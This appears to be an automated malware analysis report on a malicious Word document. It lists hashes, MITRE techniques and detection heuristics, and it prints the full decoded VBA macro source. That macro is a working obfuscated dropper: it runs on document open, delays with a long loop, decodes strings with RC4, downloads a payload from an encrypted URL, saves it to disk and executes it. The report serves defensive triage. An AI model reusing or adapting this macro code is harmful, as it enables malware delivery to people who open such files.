Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7639ff35053e4528…

MALICIOUS

Office (OOXML)

31.9 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-22
MD5: 6371682469dabdccc6133ff338ba6c50 SHA-1: 7211b5c7b730d2698857580ffc8f2f6fd64bf37a SHA-256: 7639ff35053e4528f9efbf17ddca45159ac21f575dfbc8ed90cc258e53c5a12a
320 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The sample is a malicious OOXML document containing obfuscated VBA macros. The document body acts as a lure, instructing the user to 'Enable Editing' and 'Enable Content' to view the protected document. Heuristics indicate an obfuscated auto-exec loader that uses CreateObject and execution sinks, strongly suggesting it downloads and executes a second-stage payload. The ClamAV detection name 'Doc.Malware.Chronos-6897935-0' further confirms its malicious nature.

Heuristics 10

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set LeufCdy = CreateObject(Yp4yITuMaTLs3i(Chr(38) + Chr(161) + Chr(40) + Chr(208) + Chr(161) + Chr(171) + Chr(74) + Chr(153) + Chr(163) + Chr(27) + Chr(243) + Chr(188) + Chr(107) + Chr(157) + Chr(208) + Chr(26) + Chr(115) + Chr(201) + Chr(253) + Chr(241), "WFBz1EgBb"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set LeufCdy = CreateObject(Yp4yITuMaTLs3i(Chr(38) + Chr(161) + Chr(40) + Chr(208) + Chr(161) + Chr(171) + Chr(74) + Chr(153) + Chr(163) + Chr(27) + Chr(243) + Chr(188) + Chr(107) + Chr(157) + Chr(208) + Chr(26) + Chr(115) + Chr(201) + Chr(253) + Chr(241), "WFBz1EgBb"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    BYx6OEUizZ1 = Environ(Yp4yITuMaTLs3i(Chr(61) + Chr(27) + Chr(129) + Chr(176) + Chr(2) + Chr(54) + Chr(222), "FQBZP")) & "\" & VdooXOAR & Yp4yITuMaTLs3i(Chr(55) + Chr(231) + Chr(45) + Chr(244), "Xl2oA2s5xk")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12612 bytes
SHA-256: 79a38358c2aaaff5faad069b3b5b477568bf92fc54bdf9584d420f86d4959b55
Detection
ClamAV: No threats found
Obfuscation or payload: likely
88 of 170 identifiers look randomly generated (e.g. 'HeJg4b9bcK57tUTqgWj09zy3sVU') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub XZUjpjcZWEZ()
Dim OkLaQ9TOeF As Long, HoggZFPOWVrWKlMV As Long
OkLaQ9TOeF = 97
HoggZFPOWVrWKlMV = 59
If OkLaQ9TOeF + HoggZFPOWVrWKlMV > 2 Then
HoggZFPOWVrWKlMV = OkLaQ9TOeF + 50
Else
MsgBox 51
End If
Join CNwwlNylpiY, 94
GetAllSettings 68, 21
DateSerial 64, 61, 16
MoahFMP3hkC = LCase(79)
If CDate(14) = True Then XNsnE0L62WSz7TI = 8694
If CDbl(44) = True Then EgCTupXnop5 = 94
If CByte(16) = True Then OmrpKOClOwc = 540
Command
Weekday 34
Partition 77, 20, 67, 52
WeekdayName 44
FreeFile 66
Month 28
Log 69
AppActivate 45
If CCur(63) = True Then MrB5S2Q84H7n5Ut = 998
ChDir 55
If Abs(59) = 22 Then RvB3RZnwy2hQ = 6071
Q9fSlxQ = QBColor(86)
If IsNumeric(66) = True Then J21YSSYqPmD = 27
DatePart "PxuaAjTjxxzxHJ", 45
Sqr 46
App.LogEvent "TkFh4JN2"
DoEvents
Tan 42
Beep
DateDiff "UFnbr", 52, 96
GetSetting 10, 24, 82
Year 7
Choose 6, BtTOWVrWKlMV
Dim F3WnaHJHlb As Long, Y7rtvE As Long
F3WnaHJHlb = 2
Y7rtvE = 94
If F3WnaHJHlb + Y7rtvE > 2 Then
Y7rtvE = F3WnaHJHlb + 17
Else
MsgBox 49
End If
End Sub
Sub Uzt8Nm()
Dim NC0RmF7kXqo As Long, VHDNYpWKs As Long
NC0RmF7kXqo = 48
VHDNYpWKs = 30
If NC0RmF7kXqo + VHDNYpWKs > 2 Then
VHDNYpWKs = NC0RmF7kXqo + 12
Else
MsgBox 39
End If
Dim BYx6OEUizZ1 As String, LeufCdy As Object, H0dpC6IWoie3cO As Integer
Dim B3sVUqHL As Long, Cw804c As Long
B3sVUqHL = 89
Cw804c = 60
If B3sVUqHL + Cw804c > 2 Then
Cw804c = B3sVUqHL + 47
Else
MsgBox 61
End If
BYx6OEUizZ1 = Environ(Yp4yITuMaTLs3i(Chr(61) + Chr(27) + Chr(129) + Chr(176) + Chr(2) + Chr(54) + Chr(222), "FQBZP")) & "\" & VdooXOAR & Yp4yITuMaTLs3i(Chr(55) + Chr(231) + Chr(45) + Chr(244), "Xl2oA2s5xk")
Dim JQLJfFLMVurh3Qvg8mXRid As Long, GGL0VG8 As Long
JQLJfFLMVurh3Qvg8mXRid = 45
GGL0VG8 = 67
If JQLJfFLMVurh3Qvg8mXRid + GGL0VG8 > 2 Then
GGL0VG8 = JQLJfFLMVurh3Qvg8mXRid + 28
Else
MsgBox 43
End If
Set LeufCdy = CreateObject(Yp4yITuMaTLs3i(Chr(38) + Chr(161) + Chr(40) + Chr(208) + Chr(161) + Chr(171) + Chr(74) + Chr(153) + Chr(163) + Chr(27) + Chr(243) + Chr(188) + Chr(107) + Chr(157) + Chr(208) + Chr(26) + Chr(115) + Chr(201) + Chr(253) + Chr(241), "WFBz1EgBb"))
Dim RpB8aI2cB As Long, H0N6nu5AU As Long
RpB8aI2cB = 5
H0N6nu5AU = 16
If RpB8aI2cB + H0N6nu5AU > 2 Then
H0N6nu5AU = RpB8aI2cB + 8
Else
MsgBox 31
End If
LeufCdy.Open Yp4yITuMaTLs3i(Chr(134) + Chr(138) + Chr(73), "NlcxdqCCDUL"), Yp4yITuMaTLs3i(Chr(43) + Chr(210) + Chr(70) + Chr(56) + Chr(21) + Chr(56) + Chr(168) + Chr(153) + Chr(212) + Chr(135) + Chr(48) + Chr(167) + Chr(210) + Chr(135) + Chr(131) + Chr(207) + Chr(55) + Chr(104) + Chr(186) + Chr(9) + Chr(6) + Chr(58) + Chr(128) + Chr(53) + Chr(176) + Chr(241) + Chr(136), "OKS3g3WnaHJHl"), False
Dim AFXBn As Long, Tm4PvDXs4ILEMN3xp As Long
AFXBn = 87
Tm4PvDXs4ILEMN3xp = 39
If AFXBn + Tm4PvDXs4ILEMN3xp > 2 Then
Tm4PvDXs4ILEMN3xp = AFXBn + 11
Else
MsgBox 42
End If
LeufCdy.setRequestHeader Yp4yITuMaTLs3i(Chr(97) + Chr(76) + Chr(51) + Chr(166) + Chr(156) + Chr(134) + Chr(60) + Chr(131) + Chr(55) + Chr(219), "MqPU3omwe"), Yp4yITuMaTLs3i(Chr(208) + Chr(246) + Chr(68) + Chr(14) + Chr(178) + Chr(247) + Chr(75) + Chr(172) + Chr(219) + Chr(197) + Chr(106), "OVQpJVkPTXJ")
LeufCdy.send
If LeufCdy.Status = 200 Then
Dim MZfqPU3 As Long, LGFYbYPFUqf32tghEly As Long
MZfqPU3 = 65
LGFYbYPFUqf32tghEly = 78
If MZfqPU3 + LGFYbYPFUqf32tghEly > 2 Then
LGFYbYPFUqf32tghEly = MZfqPU3 + 92
Else
MsgBox 51
End If
H0dpC6IWoie3cO = FreeFile
Open BYx6OEUizZ1 For Binary Access Write Lock Write As #H0dpC6IWoie3cO
Put #H0dpC6IWoie3cO, , Yp4yITuMaTLs3i(StrConv(LeufCdy.ResponseBody, vbUnicode), Yp4yITuMaTLs3i(Chr(106) + Chr(20) + Chr(243) + Chr(88) + Chr(231) + Chr(245) + Chr(250) + Chr(141) + Chr(124), "E8bafQ5a5IRo"))
Close #H0dpC6IWoie3cO
Dim ExusvcrL As Long, MoYon0UeRJ9 As Long
ExusvcrL = 83
MoYon0UeRJ9 = 52
If ExusvcrL + MoYon0UeRJ9 > 2 Then
MoYon0UeRJ9 = ExusvcrL + 72
Else
MsgBox 83
End If
Dnyh6 1
Dim UtmkQIuWS As Long, J5O5a2jfQsW5d As Long
UtmkQIuWS = 10
J5O5a2jfQsW5d = 24
If UtmkQIuWS + J5O5a2jfQsW5d > 2 Then
J5O5a2jfQsW5d = UtmkQIuWS + 56
Else
MsgBox 8
End If
CreateObject(Yp4yITuMaTLs3i(Chr(64) + Chr(200) + Chr(255) + Chr(207) + Chr(21) + Chr(202) + Chr(148) + Chr(193) + Chr(141) + Chr(9) + Chr(156) + Chr(254) + Chr(180), "FFUqf3H7O4e")).Run """" & BYx6OEUizZ1 & """"
Dim HeJg4b9bcK57tUTqgWj09zy3sVU As Long, Jg4b9bcK57tUTqgW As Long
HeJg4b9bcK57tUTqgWj09zy3sVU = 23
Jg4b9bcK57tUTqgW = 59
If HeJg4b9bcK57tUTqgWj09zy3sVU + Jg4b9bcK57tUTqgW > 2 Then
Jg4b9bcK57tUTqgW = HeJg4b9bcK57tUTqgWj09zy3sVU + 97
Else
MsgBox 35
End If
End If
Dim SLx0rFV As Long, NSyHzRwq As Long
SLx0rFV = 55
NSyHzRwq = 63
If SLx0rFV + NSyHzRwq > 2 Then
NSyHzRwq = SLx0rFV + 13
Else
MsgBox 63
End If
Set LeufCdy = Nothing
Dim KQgh1iVdB As Long, YBTY As Long
KQgh1iVdB = 60
YBTY = 96
If KQgh1iVdB + YBTY > 2 Then
YBTY = KQgh1iVdB + 13
Else
MsgBox 92
End If
End Sub
Function Yp4yITuMaTLs3i(ByVal Tb7rPv As String, ByVal TlJ8VNU0fU As String) As String
Dim PJDDXMV3OwkL As Long, IJLN46kC6Lj As Long
PJDDXMV3OwkL = 26
IJLN46kC6Lj = 71
If PJDDXMV3OwkL + IJLN46kC6Lj > 2 Then
IJLN46kC6Lj = PJDDXMV3OwkL + 61
Else
MsgBox 18
End If
On Error Resume Next
Dim XjBQbJbgoAFJ9k3 As Long, CLyvTWoOU As Long
XjBQbJbgoAFJ9k3 = 33
CLyvTWoOU = 77
If XjBQbJbgoAFJ9k3 + CLyvTWoOU > 2 Then
CLyvTWoOU = XjBQbJbgoAFJ9k3 + 46
Else
MsgBox 66
End If
Dim VR1ixs9M2(0 To 255) As Integer, K0lFWRPWVGpr As Long, ABVSQ05RFkt8JFWB As Long, DUizZ1GUGC As Long, SgO5CVtxZ() As Byte, NUTlK() As Byte, Yr6IWoie3cO As Byte
Dim DNqCUWxerZt As Long, THXWy8lSlD As Long
DNqCUWxerZt = 24
THXWy8lSlD = 33
If DNqCUWxerZt + THXWy8lSlD > 2 Then
THXWy8lSlD = DNqCUWxerZt + 78
Else
MsgBox 91
End If
SgO5CVtxZ() = StrConv(TlJ8VNU0fU, vbFromUnicode)
Dim NuBdt0rvFTX As Long, QnmEsZ4UPOb85 As Long
NuBdt0rvFTX = 64
QnmEsZ4UPOb85 = 85
If NuBdt0rvFTX + QnmEsZ4UPOb85 > 2 Then
QnmEsZ4UPOb85 = NuBdt0rvFTX + 96
Else
MsgBox 88
End If
For K0lFWRPWVGpr = 0 To 255
VR1ixs9M2(K0lFWRPWVGpr) = K0lFWRPWVGpr
Next K0lFWRPWVGpr
K0lFWRPWVGpr = 0
ABVSQ05RFkt8JFWB = 0
DUizZ1GUGC = 0
For K0lFWRPWVGpr = 0 To 255
ABVSQ05RFkt8JFWB = (ABVSQ05RFkt8JFWB + VR1ixs9M2(K0lFWRPWVGpr) + SgO5CVtxZ(K0lFWRPWVGpr Mod Len(TlJ8VNU0fU))) Mod 256
Yr6IWoie3cO = VR1ixs9M2(K0lFWRPWVGpr)
VR1ixs9M2(K0lFWRPWVGpr) = VR1ixs9M2(ABVSQ05RFkt8JFWB)
VR1ixs9M2(ABVSQ05RFkt8JFWB) = Yr6IWoie3cO
Next K0lFWRPWVGpr
K0lFWRPWVGpr = 0
ABVSQ05RFkt8JFWB = 0
DUizZ1GUGC = 0
NUTlK() = StrConv(Tb7rPv, vbFromUnicode)
For K0lFWRPWVGpr = 0 To Len(Tb7rPv)
ABVSQ05RFkt8JFWB = (ABVSQ05RFkt8JFWB + 1) Mod 256
DUizZ1GUGC = (DUizZ1GUGC + VR1ixs9M2(ABVSQ05RFkt8JFWB)) Mod 256
Yr6IWoie3cO = VR1ixs9M2(ABVSQ05RFkt8JFWB)
VR1ixs9M2(ABVSQ05RFkt8JFWB) = VR1ixs9M2(DUizZ1GUGC)
VR1ixs9M2(DUizZ1GUGC) = Yr6IWoie3cO
NUTlK(K0lFWRPWVGpr) = NUTlK(K0lFWRPWVGpr) Xor (VR1ixs9M2((VR1ixs9M2(ABVSQ05RFkt8JFWB) + VR1ixs9M2(DUizZ1GUGC)) Mod 256))
Next K0lFWRPWVGpr
Dim AydhuIcDt As Long, BFMzp7UEQp3m As Long
AydhuIcDt = 50
BFMzp7UEQp3m = 27
If AydhuIcDt + BFMzp7UEQp3m > 2 Then
BFMzp7UEQp3m = AydhuIcDt + 45
Else
MsgBox 90
End If
Yp4yITuMaTLs3i = StrConv(NUTlK, vbUnicode)
Dim BR5JJjCsaw As Long, LRlw09 As Long
BR5JJjCsaw = 92
LRlw09 = 74
If BR5JJjCsaw + LRlw09 > 2 Then
LRlw09 = BR5JJjCsaw + 56
Else
MsgBox 82
End If
End Function
Function VdooXOAR() As String
Dim P8XUnE8F3LEe4v As Long, TTaiCO As Long
P8XUnE8F3LEe4v = 37
TTaiCO = 68
If P8XUnE8F3LEe4v + TTaiCO > 2 Then
TTaiCO = P8XUnE8F3LEe4v + 20
Else
MsgBox 19
End If
Dim J4mxizWSh() As Byte, G0Ji26kVdbRVH() As Byte, WpHN7foU As Long, PBNJtCf As Long, M8u4EJ7OjmLH7 As String, RvQtaNpmQ7 As String, GumBxahn As Long
Dim RJ5Mc As Long, QTC8vmsGzN As Long
RJ5Mc = 2
QTC8vmsGzN = 23
If RJ5Mc + QTC8vmsGzN > 2 Then
QTC8vmsGzN = RJ5Mc + 11
Else
MsgBox 46
End If
GumBxahn = 0
Dim SFkHYLXyU40n As Long, PMUmHLRPabWKtCTP0 As Long
SFkHYLXyU40n = 15
PMUmHLRPabWKtCTP0 = 37
If SFkHYLXyU40n + PMUmHLRPabWKtCTP0 > 2 Then
PMUmHLRPabWKtCTP0 = SFkHYLXyU40n + 43
Else
MsgBox 71
End If
ONEmuct3u6Enh:
Dim KSRKk5KwS As Long, IcUyzvlJ As Long
KSRKk5KwS = 1
IcUyzvlJ = 50
If KSRKk5KwS + IcUyzvlJ > 2 Then
IcUyzvlJ = KSRKk5KwS + 2
Else
MsgBox 23
End If
Randomize
RvQtaNpmQ7 = Int(30 * Rnd)
If RvQtaNpmQ7 < 4 Then GoTo ONEmuct3u6Enh
GumBxahn = RvQtaNpmQ7
If GumBxahn > 0& Then
Dim NsBU3JPSSArS As Long, QBjIZoQbkZl As Long
NsBU3JPSSArS = 79
QBjIZoQbkZl = 15
If NsBU3JPSSArS + QBjIZoQbkZl > 2 Then
QBjIZoQbkZl = NsBU3JPSSArS + 9
Else
MsgBox 53
End If
M8u4EJ7OjmLH7 = Yp4yITuMaTLs3i(Chr(104) + Chr(188) + Chr(117) + Chr(134) + Chr(179) + Chr(107) + Chr(185) + Chr(32) + Chr(102) + Chr(30), "JUSYO")
Randomize
J4mxizWSh = M8u4EJ7OjmLH7
WpHN7foU = Len(M8u4EJ7OjmLH7) - 1&
GumBxahn = (GumBxahn * 2&) - 1&
ReDim G0Ji26kVdbRVH(GumBxahn) As Byte
Dim OoAW4mLq4e As Long, WJzNOYTdiCO1CL6l As Long
OoAW4mLq4e = 31
WJzNOYTdiCO1CL6l = 7
If OoAW4mLq4e + WJzNOYTdiCO1CL6l > 2 Then
WJzNOYTdiCO1CL6l = OoAW4mLq4e + 7
Else
MsgBox 59
End If
For PBNJtCf = 0& To GumBxahn Step 2&
G0Ji26kVdbRVH(PBNJtCf) = J4mxizWSh(CLng(WpHN7foU * Rnd) * 2&)
Next
Dim TMdYTrfynIseN As Long, TGmtE3GzS82l9 As Long
TMdYTrfynIseN = 25
TGmtE3GzS82l9 = 81
If TMdYTrfynIseN + TGmtE3GzS82l9 > 2 Then
TGmtE3GzS82l9 = TMdYTrfynIseN + 84
Else
MsgBox 47
End If
End If
Dim WJF8uwi3Pr7vToz As Long, CcZoZlukBAl As Long
WJF8uwi3Pr7vToz = 52
CcZoZlukBAl = 71
If WJF8uwi3Pr7vToz + CcZoZlukBAl > 2 Then
CcZoZlukBAl = WJF8uwi3Pr7vToz + 61
Else
MsgBox 18
End If
VdooXOAR = G0Ji26kVdbRVH
Dim Vf4DSZt As Long, BLzpqLhmF014jm As Long
Vf4DSZt = 53
BLzpqLhmF014jm = 68
If Vf4DSZt + BLzpqLhmF014jm > 2 Then
BLzpqLhmF014jm = Vf4DSZt + 71
Else
MsgBox 89
End If
End Function
Sub Dnyh6(C2GOyuITB As Long)
Dim JGekhGlQpmni As Long, PkBAlK7zN9 As Long
JGekhGlQpmni = 89
PkBAlK7zN9 = 7
If JGekhGlQpmni + PkBAlK7zN9 > 2 Then
PkBAlK7zN9 = JGekhGlQpmni + 8
Else
MsgBox 5
End If
Dim CJzg5PxlYG As Long
Dim GE1CHeI6iC98NpvN As Long, O6057O As Long
GE1CHeI6iC98NpvN = 60
O6057O = 96
If GE1CHeI6iC98NpvN + O6057O > 2 Then
O6057O = GE1CHeI6iC98NpvN + 13
Else
MsgBox 92
End If
CJzg5PxlYG = Timer + C2GOyuITB
Do While Timer < CJzg5PxlYG
DoEvents
Loop
Dim Noq2p As Long, Pq8c As Long
Noq2p = 19
Pq8c = 72
If Noq2p + Pq8c > 2 Then
Pq8c = Noq2p + 11
Else
MsgBox 70
End If
End Sub
Sub Document_Open()
Dim YVTseaX2LBdr As Long, NaKVG6Niw As Long
YVTseaX2LBdr = 67
NaKVG6Niw = 76
If YVTseaX2LBdr + NaKVG6Niw > 2 Then
NaKVG6Niw = YVTseaX2LBdr + 48
Else
MsgBox 34
End If
Dim IaTfUxASVUrjLFukx As Long, GouWiKVFB8Qo As Long, YpgOrNvDX6P8xiFs As Long
Dim IUb2AN3bRSuf3 As Long, PMFy2mgp8aaqwzy9 As Long
IUb2AN3bRSuf3 = 10
PMFy2mgp8aaqwzy9 = 48
If IUb2AN3bRSuf3 + PMFy2mgp8aaqwzy9 > 2 Then
PMFy2mgp8aaqwzy9 = IUb2AN3bRSuf3 + 59
Else
MsgBox 74
End If
IaTfUxASVUrjLFukx = 916281782: GouWiKVFB8Qo = 0: YpgOrNvDX6P8xiFs = 0
Dim KAdds2VTseaX2LB As Long, GpuXdKVG6Niw As Long
KAdds2VTseaX2LB = 38
GpuXdKVG6Niw = 18
If KAdds2VTseaX2LB + GpuXdKVG6Niw > 2 Then
GpuXdKVG6Niw = KAdds2VTseaX2LB + 78
Else
MsgBox 69
End If
For GouWiKVFB8Qo = 1 To IaTfUxASVUrjLFukx
YpgOrNvDX6P8xiFs = YpgOrNvDX6P8xiFs + 1
Next GouWiKVFB8Qo
Dim Yly8 As Long, SOrWSN9AFVZsx As Long
Yly8 = 63
SOrWSN9AFVZsx = 14
If Yly8 + SOrWSN9AFVZsx > 2 Then
SOrWSN9AFVZsx = Yly8 + 36
Else
MsgBox 24
End If
If YpgOrNvDX6P8xiFs = IaTfUxASVUrjLFukx Then
Dim HD13RxqcviA2 As Long, OgYUd35c As Long
HD13RxqcviA2 = 23
OgYUd35c = 83
If HD13RxqcviA2 + OgYUd35c > 2 Then
OgYUd35c = HD13RxqcviA2 + 1
Else
MsgBox 2
End If
Uzt8Nm
Dim TbRWCI0rDZkAu As Long, K0kFVSKlnOP5 As Long
TbRWCI0rDZkAu = 47
K0kFVSKlnOP5 = 62
If TbRWCI0rDZkAu + K0kFVSKlnOP5 > 2 Then
K0kFVSKlnOP5 = TbRWCI0rDZkAu + 65
Else
MsgBox 83
End If
Else
Dim ThIBRXCQN As Long, Im7cLiCdflH2 As Long
ThIBRXCQN = 23
Im7cLiCdflH2 = 62
If ThIBRXCQN + Im7cLiCdflH2 > 2 Then
Im7cLiCdflH2 = ThIBRXCQN + 17
Else
MsgBox 26
End If
XZUjpjcZWEZ
Dim KojAk8Go3bM As Long, ELW1YTYVylD9 As Long
KojAk8Go3bM = 92
ELW1YTYVylD9 = 76
If KojAk8Go3bM + ELW1YTYVylD9 > 2 Then
ELW1YTYVylD9 = KojAk8Go3bM + 24
Else
MsgBox 80
End If
End If
Dim Upb1X12U As Long, SPj4T8xl As Long
Upb1X12U = 14
SPj4T8xl = 12
If Upb1X12U + SPj4T8xl > 2 Then
SPj4T8xl = Upb1X12U + 43
Else
MsgBox 50
End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32256 bytes
SHA-256: 032f353ad90a78648ee519a6d4c7a33d7ab5ba56086b3e95ae81e1c4a4efdc91
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.